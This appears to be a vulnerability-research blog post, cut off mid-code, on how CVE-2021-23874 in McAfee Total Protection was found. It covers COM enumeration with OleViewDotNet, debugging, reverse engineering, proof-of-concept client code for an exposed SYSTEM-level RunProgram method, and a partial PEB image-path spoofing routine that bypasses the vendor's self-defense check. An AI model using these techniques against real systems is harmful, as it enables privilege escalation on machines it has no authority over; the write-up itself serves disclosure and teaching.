In February McAfee fixed 2 vulnerabilities (CVE-2021-23874 and CVE-2021-23875) in their flagship consumer anti-virus (AV) product McAfee Total Protection. These issues were local privilege escalations, and CVE-2021-23874 was present in a McAfee COM-object. It seems to me that the topic of hunting bugs in COM-objects isn’t very well covered on the Internet, so this post should fill that gap and show an approach to finding COM-object bugs, using CVE-2021-23874 as an example. On the other hand, the post can be considered a real-world walkthrough with OleViewDotNet (OVDN).

0x01: Prerequisites

To successfully reproduce the steps described in the following sections, you need:

  1. McAfee Total Protection 16.0 R28;
  2. OVDN commit 55b5cb0 (or later). An up-to-date version is necessary, since it contains bug fixes needed for the cmdlets used here to work correctly, and these fixes haven’t been included in the v1.11 release yet;
  3. OS Windows (any version, but I used 2004 x64);
  4. WinDbg;
  5. IDA Free or any other powerful disassembler.

0x02: Attack Surface Enumeration

If we are hunting for an LPE in the COM-objects of a specific product, in this case McAfee Total Protection, then we are interested in objects with the following 3 characteristics:

  1. COM-objects are installed into the system by this particular Product;
  2. COM-objects are launched out-of-process (OOP) in the context of a privileged user (in this case “NT Authority\System”);
  3. We have access to the COM-object interface from our privilege level.

All 3 characteristics are mandatory, so let’s go in order.

An obvious and pretty simple approach to finding the COM-objects installed by a product is to take a first snapshot before installation, then install the product, take a second snapshot after installation, and compare the two. This can be done using ASA, but we will do it with OVDN, since it is more scriptable, fast, and convenient for further research.

To collect an initial snapshot of installed COM-objects we need to run PowerShell with the required bitness (in this case x86), import OVDN, and type the following commands:

PS C:\> $comDb_old = Get-ComDatabase -PassThru
PS C:\> Set-ComDatabase -Path ComDb_old.db -Database $comDb_old 

The PowerShell bitness is important because of the way OVDN works: for example, the x64 version can collect COM-object information only from *\SOFTWARE\Classes, and the x86 version only from *\SOFTWARE\WOW6432Node\Classes. At the same time, the x64 version can parse both x64 and WoW64 processes, while the x86 version can parse only WoW64 processes. Thus, there is no single rule for what OVDN of a specific bitness can do, but simple advice is to use 32-bit OVDN for 32-bit COM entries and 64-bit OVDN for 64-bit entries. And for security research, use both versions.

The above commands collect information about registered COM-objects and serialize it to the file ComDb_old.db. Next, we need to install the product. In this case, it is McAfee Total Protection 16.0 R28. And after a successful installation, we collect the database of registered COM-objects again and find the differences with the snapshot collected in the previous step:

PS C:\> $comDb = Get-ComDatabase -PassThru
PS C:\> $comDb_old = Get-ComDatabase -Path ComDb_old.db -PassThru
PS C:\> $comDiff = Compare-ComDatabase -Left $comDb_old -Right $comDb -DiffMode RightOnly

Now we have a list of changes in variable $comDiff and we want to filter them to see OOP COM-objects running under the “NT Authority\System” account and accessible from our privilege level:

PS C:\> $comsAsSystem = $comDiff.AppIDs.Values | `
    Where-Object -FilterScript { $_.IsService -eq $True -or $_.RunAs -ieq "nt authority\system" }
PS C:\> $comsAsSystem | `
    Select-ComAccess -ProcessId (Get-Process -Name explorer).Id -Principal S-1-5-18

Name                     AppID                                IsService  HasPermission
----                     -----                                ---------  -------------
lfsvc                    020fb939-2c8b-4db7-9e90-9527966e38e5 True       True
AppReadiness Service     88283d7c-46f4-47d5-8fc2-db0b5cf0cb54 True       True
Bluetooth AVCTP Service  b98c6eb5-6aa7-471e-b5c5-d04fd677db3b True       True

When, in the second command, we test for accessible COM-objects, we must use the -Principal parameter to replace the SELF SID with the appropriate SID under which the COM-object will run. As we can see from the command output, there are no McAfee COM-objects in the system accessible from our privilege level. Here, in theory, the research could end; but if we remember that access, in terms of the Select-ComAccess cmdlet, means having rights to both launch and access the COM-object, then we can try to see objects accessible only for launch:

PS C:\> $comsAsSystem | `
    Select-ComAccess -ProcessId (Get-Process -Name explorer).Id -Principal S-1-5-18 -LaunchAccess ActivateLocal, ExecuteLocal -Access 0

Name                           AppID                                IsService  HasPermission
----                           -----                                ---------  -------------
lfsvc                          020fb939-2c8b-4db7-9e90-9527966e38e5 True       True
Experimentation Broker         2568bfc5-cdbe-4585-b8ae-c403a2a5b84a True       True
netman                         27af75ed-20d9-11d1-b1ce-00805fc1270e True       True
McGenericCacheShim Class       67bc8c92-fa16-4991-9156-9ccba3584e5e True       True
McAfee LAM Repair Class        6be14203-35ad-4380-a10e-e7cb19471e44 False      False
Windows Insider Service        7006698d-2974-4091-a424-85dd0b909e23 True       True
HomeNetSvc                     73779221-6e6e-46d8-927e-63f67390d095 False      False
McAWFwk                        77b97c6a-cd4e-452c-8d99-08a92f1d8c83 True       False
MSC Protection Manager Serv... 7a0bf9a1-9298-48cb-9db4-b167469ebe5c False      False
McAWFwk                        7d555a20-6721-4c54-9713-6a0372868c62 True       False
AppReadiness Service           88283d7c-46f4-47d5-8fc2-db0b5cf0cb54 True       True
McAfee MCODS                   9a949ab4-7f25-4fea-bfe6-efa897d48401 False      False
Bluetooth AVCTP Service        b98c6eb5-6aa7-471e-b5c5-d04fd677db3b True       True
Platform Services Subsystem    ba79a213-d326-4fb8-89eb-deb2d5b82930 False      False
LxpSvc                         bce82fb7-43f4-4827-a503-69e561667293 True       False
McAfee VirusScan Announcer     decbf619-9830-47cd-870e-975f7fbc28bc False      False
OneSetttings Broker            e055b85b-22bd-4e15-a34d-46c58ab320ad True       True
McMPFSvc                       e0ad45ad-96c8-4a6a-891f-cfd9781b7c59 False      False
Feature Usage Listener         eab99738-0adf-4a53-856c-de58afde7682 True       True

Now we see a longer list of COM-objects, among which there are objects that clearly belong to the McAfee Total Protection product. So we can at least launch instances of some COM-objects of interest to us. Let’s take one of them, for example the one with AppId 77b97c6a-cd4e-452c-8d99-08a92f1d8c83, and figure out why there are no full access rights, but there are launch rights:

PS C:\> $coManageOemAppId = Get-ComAppId -AppId 77b97c6a-cd4e-452c-8d99-08a92f1d8c83
PS C:\> $coManageOemAppId.ClassEntries

Name                CLSID                                DefaultServerName
----                -----                                -----------------
CoManageOem Class   77b97c6a-cd4e-452c-8d99-08a92f1d8c83 <APPID HOSTED>
PS C:\> $coManageOemAppId

Name      AppID                                IsService  HasPermission
----      -----                                ---------  -------------
McAWFwk   77b97c6a-cd4e-452c-8d99-08a92f1d8c83 True       False

The COM-object CoManageOem Class with AppId name McAWFwk uses the default security descriptor. So let’s decode the default launch rights in human-readable form:

PS C:\> Show-ComSecurityDescriptor -SecurityDescriptor $coManageOemAppId.DefaultLaunchPermission

Launch rights for 77b97c6a-cd4e-452c-8d99-08a92f1d8c83

And decode the default access rights:

PS C:\> Show-ComSecurityDescriptor -SecurityDescriptor $coManageOemAppId.DefaultAccessPermission -ShowAccess

Access rights for 77b97c6a-cd4e-452c-8d99-08a92f1d8c83

All right, the COM-object’s security descriptor confirms the results obtained from the Select-ComAccess cmdlet.

0x03: COM-object Access Rights Check

In the previous section we saw that we can start the COM-server and get an instance of the implemented COM-object, but that we will not have access rights to call its methods. Obviously, this is not very promising initial data for vulnerability hunting, but still, let’s try to get a pointer to a COM-object instance:

PS C:\> $coManageOemClass = Get-ComClass -Clsid $coManageOemAppId.ComGuid
PS C:\> New-ComObject -Class $coManageOemClass
Exception calling "CreateInstanceAsObject" with "2" argument(s): "No such interface supported
No such interface supported
"
At C:\...\OleViewDotNet.psm1:1601 char:17
+ ...             $obj = $Class.CreateInstanceAsObject($ClassContext, $Remo ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : InvalidCastException

We cannot create an object because the interface is not supported. Which one? IClassFactory. CreateInstanceAsObject internally uses CoCreateInstance, which encapsulates the following code:

CoGetClassObject(rclsid, dwClsContext, NULL, IID_IClassFactory, &pCF); 
hresult = pCF->CreateInstance(pUnkOuter, riid, ppvObj);
pCF->Release();

And the error is thrown because, as we’ll see a little further on, the factory doesn’t implement the IClassFactory interface.

Then let’s try to look at the interfaces that the COM-object implements:

PS C:\> Get-ComClassInterface $coManageOemClass | Select Name, Iid

Nothing. It’s the same problem as in the previous case. Internally, to get a list of supported interfaces, OVDN creates an object using CoCreateInstance, and then calls QueryInterface for a set of known interfaces, then for all interfaces registered in HKCR\Interface, and finally using the IInspectable interface. But since a successful call to CoCreateInstance requires the factory to implement the IClassFactory interface, it is impossible to create an object and therefore impossible to query it for the implementation of other interfaces.

Let’s try to look at the interfaces that the COM-object factory implements:

PS C:\> Get-ComClassInterface -Factory $coManageOemClass | Select Name, Iid

Name            Iid
----            ---
IMarshal        00000003-0000-0000-c000-000000000046
IMarshal2       000001cf-0000-0000-c000-000000000046
IUnknown        00000000-0000-0000-c000-000000000046
IMcClassFactory fd542581-722e-45be-bed4-62a1be46af03

IMcClassFactory interface looks interesting. We can quickly see what it is by analyzing the ProxyStub:

PS C:\> Get-ComInterface -Name IMcClassFactory | Get-ComProxy | Format-ComProxy

[Guid("fd542581-722e-45be-bed4-62a1be46af03")]
interface IMcClassFactory : IUnknown {
    HRESULT Proc3(/* Stack Offset: 4 */ [In] int p0, /* Stack Offset: 8 */ [In, Out] /* C:(FC_TOP_LEVEL_CONFORMANCE)(4)(FC_ZERO)(FC_ULONG)(0) */ byte[]* p1, /* Stack Offset: 12 */ [In] GUID* p2, /* Stack Offset: 16 */ [Out] /* iid_is param offset: 12 */ IUnknown** p3);
}

Proc3 declaration is very similar to IClassFactory::CreateInstance. But this is just an observation.

From powershell we can create a factory object and get a pointer to it, thus starting the COM-server:

PS C:\> $coManageOemFactory = New-ComObjectFactory -Class $coManageOemClass
Exception calling "Wrap" with "2" argument(s): "Unable to cast COM object of type 'System.__ComObject' to interface
type 'OleViewDotNet.IClassFactory'. This operation failed because the QueryInterface call on the COM component for the
interface with IID '{00000001-0000-0000-C000-000000000046}' failed due to the following error: No such interface
supported (Exception from HRESULT: 0x80004002 (E_NOINTERFACE))."
At C:\...\OleViewDotNet.psm1:90 char:13
+             [OleViewDotNet.Wrappers.COMWrapperFactory]::Wrap($Object, ...
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : InvalidCastException

The error occurs because the code inside New-ComObjectFactory is trying to wrap the object in a callable wrapper that implements the IClassFactory interface, but this COM-object doesn’t implement it (as we already know). Let’s try to create the object without a wrapper:

PS C:\> $coManageOemFactory = New-ComObjectFactory -Class $coManageOemClass -NoWrapper

Good. We created a factory instance and got a raw pointer to it. This pointer is pretty useless in powershell:

PS C:\> $coManageOemFactory
System.__ComObject

But it is important for us that we have started the server that hosts the COM-object. And now we can investigate the process:

PS C:\> $coManageOemAppId.ServiceName
McAWFwk

The COM-object is hosted in the McAWFwk service, that is, in the process named McAWFwk.exe. And we can check once again (now dynamically) whether we have access to the COM-object in the McAWFwk.exe process. For COM-process parsing we use the Get-ComProcess cmdlet, and for access checking the already familiar Select-ComAccess:

PS C:\> Get-ComProcess -Name McAWFwk | Select-ComAccess -ProcessId (Get-Process -Name explorer).Id
ProcessId            : 396
ExecutablePath       : C:\Program Files\Common Files\McAfee\ActWiz\McAWFwk.exe
Name                 : McAWFwk
Ipids                : {IPID: 00001000-018c-0000-0e32-16ac744c0ec0 IRundown,
                       IPID: 00008801-018c-ffff-b88b-86753a985eda IRundown,
                       IPID: 00009002-018c-0000-c423-83b6f2efa724 ILocalSystemActivator,
                       IPID: 00008803-018c-0000-a9f7-7cb9cdfdb224 IUnknown}
RunningIpids         : {IPID: 00001000-018c-0000-0e32-16ac744c0ec0 IRundown,
                       IPID: 00008801-018c-ffff-b88b-86753a985eda IRundown,
                       IPID: 00009002-018c-0000-c423-83b6f2efa724 ILocalSystemActivator,
                       IPID: 00008803-018c-0000-a9f7-7cb9cdfdb224 IUnknown}
Is64Bit              : True
AppId                : 7d555a20-6721-4c54-9713-6a0372868c62
AccessPermissions    : D:NO_ACCESS_CONTROL
LRpcPermissions      : D:(A;;0xeff3ffff;;;WD)(A;;0xeff3ffff;;;AN)(A;;GR;;;AC)(A;;GR;;;S-1-15-3-1024-2405443489-874036122-4286035555-1823921565-1746547431-2453885448-3625952902-991631256)
User                 : NT AUTHORITY\SYSTEM
UserSid              : S-1-5-18
...

Select-ComAccess returned the COM-process object, which means that we have access to it from our privilege level. And we can see that the COM-object has no access control. But why? We saw the prohibitive access rights in the previous section.

0x04: Bug

In order to understand what is going on, it is enough to attach a debugger (in this case WinDbg) to the McAWFwk service at its start and set a breakpoint at the beginning of the CoInitializeSecurity function. Having done this, let’s see the parameters passed to the function:

kd> k
 # Child-SP          RetAddr           Call Site
00 000000eb`4f4ffc78 00007ff7`0a2cddc4 combase!CoInitializeSecurity [onecore\com\combase\dcomrem\security.cxx @ 3178] 
01 000000eb`4f4ffc80 00000000`00000208 McAWFwk+0xddc4
02 000000eb`4f4ffc88 000000eb`4f2ff980 0x208
03 000000eb`4f4ffc90 000000eb`4f4ffce0 0x000000eb`4f2ff980
04 000000eb`4f4ffc98 000000eb`4f2ff980 0x000000eb`4f4ffce0
05 000000eb`4f4ffca0 00000000`00000000 0x000000eb`4f2ff980
kd> dv /i
prv param             pVoid = 0x00000000`00000000
prv param          cAuthSvc = 0n-1
prv param         asAuthSvc = 0x00000000`00000000
prv param        pReserved1 = 0x00000000`00000000
prv param      dwAuthnLevel = 0
prv param        dwImpLevel = 3
prv param        pReserved2 = 0x00000000`00000000
prv param    dwCapabilities = 0
prv param        pReserved3 = 0x00000000`00000000
prv local        stackTrace = class ObjectLibrary::ReferencedPtr<StackTrace>
...

The displayed stack is a little bit wrong, but the last frames are correct and that’s enough for us. It is important that the pSecDesc parameter is nullptr and dwCapabilities is also 0. What this means can be found on MSDN, but I like the explanation from the book “Inside COM+: Base Services”:

If neither the EOAC_APPID nor EOAC_ACCESS_CONTROL flag is set in the dwCapabilities parameter, CoInitializeSecurity interprets pSecDesc as a pointer to a Win32 security descriptor structure that is used for access checking. If pSecDesc is NULL, no ACL checking is performed.

In other words, the COM-object has a safe default DACL in the registry, which does not allow us to access the object from our privilege level. But at startup the COM-server overrides it and makes itself available to an attacker. It is interesting that this attack surface is absent in static analysis, but appears in dynamic analysis.
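
For contrast, here is a minimal sketch of how a server could pass a restrictive security descriptor to CoInitializeSecurity instead of NULL (the SDDL string is just an example, granting COM access to SYSTEM and Administrators only; this is not McAfee’s code):

#include <windows.h>
#include <sddl.h>

HRESULT InitComSecurityRestricted()
{
    // Build an SD with owner/group set and a DACL granting COM_RIGHTS_EXECUTE (0x1)
    // to SYSTEM (SY) and Administrators (BA) only.
    PSECURITY_DESCRIPTOR sd = nullptr;
    if (!::ConvertStringSecurityDescriptorToSecurityDescriptorW(
            L"O:BAG:BAD:(A;;0x1;;;SY)(A;;0x1;;;BA)", SDDL_REVISION_1, &sd, nullptr))
        return HRESULT_FROM_WIN32(::GetLastError());

    // A non-NULL pSecDesc without EOAC_APPID/EOAC_ACCESS_CONTROL makes COM
    // perform ACL checks on incoming calls - unlike the nullptr/0 combination
    // observed in McAWFwk.exe above.
    HRESULT hr = ::CoInitializeSecurity(sd, -1, nullptr, nullptr,
        RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IDENTIFY,
        nullptr, EOAC_NONE, nullptr);
    ::LocalFree(sd);
    return hr;
}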

Obviously, we get an attack surface that was not foreseen at the design stage. Therefore it becomes very promising to hunt for bugs in this component.

0x05: COM-object Implementation RE

The next important question is the functionality that this COM-object implements and exposes. The only way to research this is reverse engineering (RE). And the starting point will be to find out the address of the vtable of the COM-object factory:

PS C:\> (Get-ComProcess -Name McAWFwk -ParseRegisteredClasses).Classes | Format-List
Name         :
Clsid        : 77b97c6a-cd4e-452c-8d99-08a92f1d8c83
ClassEntry   :
ClassFactory : 140702464808720
VTable       : McAWFwk+0x56F78
Apartment    : MTA
RegFlags     : MULTIPLEUSE
Cookie       : 34
ThreadId     : -1
Context      : INPROC_SERVER, LOCAL_SERVER
ProcessID    : 396
ProcessName  : McAWFwk
Registered   : False
Process      : 396 McAWFwk

Name         :
Clsid        : 7d555a20-6721-4c54-9713-6a0372868c62
...

Next we go to the disassembler (in this case IDA) and see the table of virtual methods of the COM-object factory at address McAWFwk+0x56F78:

CoManageOemFactory virtual table

Obviously, we are interested in Proc3, the method that appears in the vtable right after QueryInterface, AddRef and Release; based on the logic of a factory, this function should allow creating an object. Here’s a simplified listing of Proc3, which I named CoManageOEMFactory::InternalCreateObjectWrapper:

InternalCreateObjectWrapper listing

The method CoManageOEMFactory::InternalCreateObjectWrapper checks that the call comes from a valid module and delegates the work to Proc4 from the CoManageOemFactory vtable. The parameters are passed as-is. Since the COM-object is OOP, our code does not in any way affect the validity of the module from which InternalCreateObjectWrapper is called, so the ValidateModule check will always succeed and return 0, which prevents us from getting the ACCESS_DENIED error.

Let’s look at the listing of Proc4 (or as I named it CoManageOEMFactory::InternalCreateObject):

InternalCreateObject listing

As we can see in the above listing, the method calls the McCreateInstance function with the arguments GUID e66d03f6-c1cf-4d8c-997c-fae8763375f6 and IID 9b6c414a-799d-4506-87d1-6eb78d0a3580. Then, in the pManageOem argument, we get a pointer to the COM-object, from which the user-specified interface is queried. Let’s see what happens in the McCreateInstance function:

McCreateInstance listing

McCreateInstance receives a pointer to the IMcClassFactory factory interface of the object, the CLSID of which was passed as an argument, and then, using this factory, creates an object and returns an interface pointer of the specified type to the object. In fact, McCreateInstance is semantically identical to CoCreateInstance, with the difference that the latter uses the IClassFactory interface to create an object, and the former uses IMcClassFactory.

Now it is clear that the method CoManageOEMFactory::InternalCreateObjectWrapper creates within itself an object with CLSID e66d03f6-c1cf-4d8c-997c-fae8763375f6 that implements the IMcClassFactory factory, then queries the specified interface and returns it to the client. Let’s see what kind of object is being created:

PS C:\> $manageOemClass = Get-ComClass -PartialClsid 'e66d03f6'
PS C:\> $manageOemClass

Name             CLSID                                DefaultServerName
----             -----                                -----------------
ManageOem Class  e66d03f6-c1cf-4d8c-997c-fae8763375f6 McDspWrp.dll

PS C:\> Get-ComClassInterface -ClassEntry $manageOemClass
PS C:\> Get-ComClassInterface -ClassEntry $manageOemClass -Factory

Name             IID                                  Module        VTableOffset
----             ---                                  ------        ------------
IUnknown         00000000-0000-0000-c000-000000000046 McDspWrp.dll  1012304
IMcClassFactory  fd542581-722e-45be-bed4-62a1be46af03 McDspWrp.dll  1012304

Again, we cannot get a list of interfaces that the COM-object implements, since its factory doesn’t implement the IClassFactory interface. So let’s look at the definition of the interface 9b6c414a-799d-4506-87d1-6eb78d0a3580 that is queried from the COM-object in the method CoManageOEMFactory::InternalCreateObjectWrapper:

PS C:\> Get-ComInterface -PartialIid '9b6c414a'

Name        IID                                  HasProxy  HasTypeLib
----        ---                                  --------  ----------
IManageOem  9b6c414a-799d-4506-87d1-6eb78d0a3580 True      True

For the interface IManageOem, there is a ProxyStub Dynamic-Link Library (DLL), which can be decompiled, and a TypeLib, from which information can be extracted. We use the TypeLib because it contains more information:

PS C:\> $manageOemTypeLib = Get-ComTypeLib -Iid 9b6c414a-799d-4506-87d1-6eb78d0a3580
PS C:\> Get-ComTypeLibAssembly $manageOemTypeLib | Format-ComTypeLib

The output contains many different types, structures and interface definitions from the TypeLib, but the only interesting thing for us is the definition of the IManageOem interface:

[Guid("9b6c414a-799d-4506-87d1-6eb78d0a3580")]
interface IManageOem : IDispatch
{
   /* Methods */
   string GetTempFileName(string bstrPath);
   tagMCREGIST_RETURN_CODE RunProgram(string bstrExePath, string bstrCmdLine);
   ...
   object RunProgramAndWait(string bstrAppName, string bstrCmdLine);
   object RunProgramAndWaitEx(string bstrAppName, string bstrCmdLine, string bstrWorkingDir);
   ...
   tagMCREGIST_RETURN_CODE RegCreateKey(string bstrKeyPath);
   tagMCREGIST_RETURN_CODE RegDeleteKey(string bstrKeyPath);
   ...
   tagMCREGIST_RETURN_CODE RegSetValue(string bstrKeyPath, string bstrValueName, object vValue);
   tagMCREGIST_RETURN_CODE RegDeleteValue(string bstrKeyPath, string bstrValueName);
   ...
   tagMCREGIST_RETURN_CODE IniWriteValue(string bstrIniFilePath, string bstrSectionName, string bstrKeyName, [Optional] object vValue);
   ...
   bool RemoveFiles(string bstrFilePath);
   ...
   bool CopyFiles(string bstrSourcePath, string bstrDestPath, bool vbFailIfExists);
   bool RemoveFolder(string bstrFolder, bool vbDelSubFolders);
   ...
   bool SetFileAttributes(string bstrFilePath, int lAttributes);
   ...
   void CreateTaskScheduleEntry(string bstrTaskname, object dwNextrun, object dwDefaultFreq);
   void DeleteTask(string bstrTaskname);
   ...
   string ReadFile(string varFilePath, bool bBase64);
   ...
}

The interface IManageOem contains many attractive methods, but only the most promising ones are shown in the listing above. To find out the address of the function that implements a specific interface method, we must take the following steps:

  1. Attach WinDbg to McAWFwk.exe process and set a breakpoint on the instruction after returning from the McCreateInstance function;
  2. Write and execute client code that will call the CoManageOEMFactory::InternalCreateObject method;
  3. When the breakpoint hits, dump the object’s virtual function table and find the address of the function by its index.

To find the instruction on which to set a breakpoint, we need to disassemble the method CoManageOEMFactory::InternalCreateObject implemented in the McAWFwk.exe binary:

InternalCreateObject disasm

The instruction test rcx, rcx at address McAWFwk+0xc2f1 checks the value of the pManageOem pointer returned from the McCreateInstance function. So, after McCreateInstance completes successfully, the rcx register contains the address of the object, at offset 0 of which the address of the first virtual table is located.

Client code that calls the method CoManageOEMFactory::InternalCreateObject is shown below:

class __declspec(uuid("fd542581-722e-45be-bed4-62a1be46af03")) IMcClassFactory :
    public IUnknown
{
public:
    virtual HRESULT __stdcall InternalCreateObject(
        _In_ REFIID riid,
        _COM_Outptr_ void **ppvObject);
};

_COM_SMARTPTR_TYPEDEF(IMcClassFactory, __uuidof(IMcClassFactory));

int main()
{
    try
    {
        HRESULT hr = ::CoInitializeEx(0, COINIT_MULTITHREADED);
        if (FAILED(hr))
            throw std::runtime_error("CoInitializeEx failed. Error: " + std::to_string(hr));
        auto coUninitializeOnExit = wil::scope_exit([] {::CoUninitialize(); });

        const GUID CLSID_CoManageOem =
            { 0x77b97c6a, 0xcd4e, 0x452c, { 0x8d, 0x99, 0x08, 0xa9, 0x2f, 0x1d, 0x8c, 0x83 } };
        IMcClassFactoryPtr pMcClassFactory;

        hr = ::CoGetClassObject(
            CLSID_CoManageOem,
            CLSCTX_LOCAL_SERVER,
            nullptr,
            IID_PPV_ARGS(&pMcClassFactory));
        if (FAILED(hr))
            throw std::runtime_error("CoGetClassObject failed. Error: " + std::to_string(hr));

        IUnknownPtr pManageOem;

        hr = pMcClassFactory->InternalCreateObject(
            __uuidof(pManageOem), reinterpret_cast<LPVOID *>(&pManageOem));
        if (FAILED(hr))
            throw std::runtime_error("InternalCreateObject failed. Error: " + std::to_string(hr));
    }
    catch (const std::exception &e)
    {
        std::cerr << "Exception: " << e.what() << std::endl;
        return -1;
    }

    return 0;
}

The code is self-explanatory and I think it doesn't need any comments. But as a result of executing the above code, the program ends with the following error: “Exception: InternalCreateObject failed. Error: -2147024891”. The decimal number -2147024891 converts to the more familiar hexadecimal number 0x80070005 (access denied). But where did the error come from? We've already seen that the COM-object permissions allow us access to the object's methods. After a bit of debugging I found that the error is returned by the ProxyStub DLL loaded into the client application. The code that precedes sending the object-creation request looks similar to the following:

InternalCreateObjectProxy listing

The check is client-side, so it can obviously be bypassed. But since the primary task at the moment is to examine the methods provided by the COM-object, for now we will bypass the validation using the debugger, and a full bypass will be presented in the next section.

Now that we know where to set a breakpoint when the object is already completely constructed, and we can trigger its creation, all that remains is to dump its virtual function table. After hitting the breakpoint it looks like this:

kd> bp McAWFwk+0xc2f1
kd> g
Breakpoint 0 hit
McAWFwk+0xc2f1:
0033:00007ff6`a764c2f1 4885c9          test    rcx,rcx
kd> dps poi(rcx)
00007ff8`1a126df8  00007ff8`1a04d058 McDspWrp+0x1d058
00007ff8`1a126e00  00007ff8`1a03c354 McDspWrp+0xc354
00007ff8`1a126e08  00007ff8`1a04cff8 McDspWrp+0x1cff8
00007ff8`1a126e10  00007ff8`1a05cb80 McDspWrp+0x2cb80
00007ff8`1a126e18  00007ff8`1a04d0d0 McDspWrp+0x1d0d0
00007ff8`1a126e20  00007ff8`1a04d134 McDspWrp+0x1d134
00007ff8`1a126e28  00007ff8`1a04d140 McDspWrp+0x1d140
00007ff8`1a126e30  00007ff8`1a04d2d4 McDspWrp+0x1d2d4
00007ff8`1a126e38  00007ff8`1a04d358 McDspWrp+0x1d358
00007ff8`1a126e40  00007ff8`1a04d3dc McDspWrp+0x1d3dc
00007ff8`1a126e48  00007ff8`1a04d460 McDspWrp+0x1d460
00007ff8`1a126e50  00007ff8`1a04d614 McDspWrp+0x1d614
00007ff8`1a126e58  00007ff8`1a04d638 McDspWrp+0x1d638
00007ff8`1a126e60  00007ff8`1a04d208 McDspWrp+0x1d208
00007ff8`1a126e68  00007ff8`1a05c168 McDspWrp+0x2c168
00007ff8`1a126e70  00007ff8`1a04d1e8 McDspWrp+0x1d1e8

The interface IManageOem inherits from the IDispatch interface. IDispatch occupies 7 vtable slots (including the inherited IUnknown methods), so you would expect the method RunProgram to be the 7th entry (numbered from 0) in the virtual function table, but in practice this method turned out to be the 14th, at address McDspWrp+0x2c168. I don't know why there is this mismatch, but my guess is that the cmdlet Get-ComTypeLibAssembly isn't parsing the TypeLib entirely correctly.
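
For readers who want to see how the dps output maps onto C++, here is a minimal illustrative sketch (my own helper, not McAfee's code) of how a vtable slot index translates into a method address. It is only meaningful against the real in-process object (e.g. under the debugger inside McAWFwk.exe); on the client side the same code would show the proxy's vtable instead:

#include <unknwn.h>

// Illustrative only: for any COM interface pointer, the first pointer-sized
// field of the object is the vtable, and slot N holds the address of the
// N-th virtual method (0-based). This mirrors `dps poi(rcx)` above, where
// slot 14 turned out to be IManageOem::RunProgram (McDspWrp+0x2c168).
void* GetVtableSlot(IUnknown* pInterface, size_t index)
{
    void** vtbl = *reinterpret_cast<void***>(pInterface); // poi(rcx)
    return vtbl[index];
}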

Now let’s look at the decompiled method IManageOem::RunProgram that implements ManageOem Class COM-object:

RunProgram listing

The above code takes the attacker-controlled exePath and cmdLine and creates a child process without impersonation; from MSDN:

The new process runs in the security context of the calling process

Thus, it is obvious that by calling this method a low-privileged user can execute an arbitrary file in the SYSTEM context (since McAWFwk runs as a service) and escalate privileges.

Another interesting point is the code on line 20, which looks vulnerable to a stack buffer overflow. Remember that the parameters are attacker-controlled, the stack buffer CommandLine has a fixed size of 1040 widechars, and wsprintfW writes these strings into that buffer. If the attacker passes a string longer than 1040 characters, it would be logical to expect the return address to be overwritten. But this is not the case: the wsprintfW documentation mentions that the “maximum size of the buffer is 1,024 bytes”, and internally the function really does not write beyond 1024 (characters, not bytes, despite what the documentation says), so the write always stays inside the 1040-widechar buffer.
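
To double-check this behaviour, here is a minimal user-mode test (my own sketch, not the vendor's code) that feeds an oversized argument into a 1040-widechar buffer the same way RunProgram does:

#include <windows.h>
#include <string>
#include <cstdio>

// Link with user32.lib (wsprintfW lives there).
int main()
{
    wchar_t commandLine[1040] = {};          // same size as the stack buffer in RunProgram
    std::wstring attackerInput(4096, L'A');  // deliberately larger than the buffer

    int written = ::wsprintfW(commandLine, L"%s", attackerInput.c_str());

    // Per the behaviour described above, wsprintfW stops at its internal
    // 1024-character limit, so the 1040-widechar buffer is never overrun.
    wprintf(L"characters written: %d\n", written);
    return 0;
}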

As a result, we can instantiate the CoManageOem Class COM-object and access its methods. This object implements the interface IMcClassFactory, and its method IMcClassFactory::InternalCreateObject returns a ManageOem Class COM-object that implements the interface IManageOem. The exposed method IManageOem::RunProgram makes it easy to escalate privileges and run an arbitrary process in the “NT Authority\System” context. Only one problem remains - the self-defense implemented in the ProxyStub - and bypassing this mechanism is discussed in the next section.

0x06: Self-Defense Bypass

As we saw in the previous section, self-defense for the COM-object is implemented in the ProxyStub DLL, which is loaded (by design, for marshalling parameters) into the address space of the client (attacker-controlled) process. So obviously we could just patch our own copy of that code to ignore the error returned from the validation function (I named it ValidateModule in the screenshot above). But this approach is not very robust: the module may be recompiled in future versions of the product, and offsets and instructions may change, and I don't want to support all the older and newer versions. So we should choose a more elegant solution - find a weakness in the code logic.

The validation implemented in the ValidateModule function performs the following two steps:

  • Gets the path to the module from which the proxy is called, using code like the following (error handling omitted for simplicity):

hProcess = ::OpenProcess(..., ::GetCurrentProcessId());
::EnumProcessModules(hProcess, hModules, ...);

while (true)
{
    ::GetModuleInformation(hProcess, hModules[i], mi, ...);
    if ((mi->lpBaseOfDll <= callerAddress) && (callerAddress - mi->lpBaseOfDll < mi->SizeOfImage))
    {
        ::GetModuleFileNameExW(hProcess, hModules[i], fileName, ...);
        break;
    }

    ++i;
}

return fileName;

  • Validates the module using the ValidateModule function exported from the library vtploader.dll:

hLibrary = ::LoadLibrary("vtploader.dll");
ValidateModule = ::GetProcAddress(hLibrary, "ValidateModule");

ValidateModule(fileName);

We can spoof the path to the module from which the call originates, or we can craft the module to pass the check implemented in vtploader!ValidateModule. Clearly the former is simpler and requires only a modification of a structure in the PEB.

Here is the corresponding C++ code to modify the path of the main binary (our proof-of-concept (PoC) calls the proxy from the main module, so that's enough) in PEB::Ldr::InMemoryOrderModuleList:

void MasqueradeImagePath(PCWCHAR imagePath)
{
    PROCESS_BASIC_INFORMATION processBasicInformation;
    ULONG processInformationLength;

    auto ntStatus = ::NtQueryInformationProcess(
        ::GetCurrentProcess(),
        ProcessBasicInformation,
        &processBasicInformation,
        sizeof(processBasicInformation),
        &processInformationLength);
    if (!NT_SUCCESS(ntStatus))
        throw std::runtime_error("NtQueryInformationProcess failed. Error: " + std::to_string(ntStatus));

    UNICODE_STRING usImagePath;
    RtlInitUnicodeString(&usImagePath, imagePath);

    auto moduleBase = ::GetModuleHandle(NULL);
    if (!moduleBase)
        throw std::runtime_error("GetModuleHandle failed. Error: " + std::to_string(::GetLastError()));

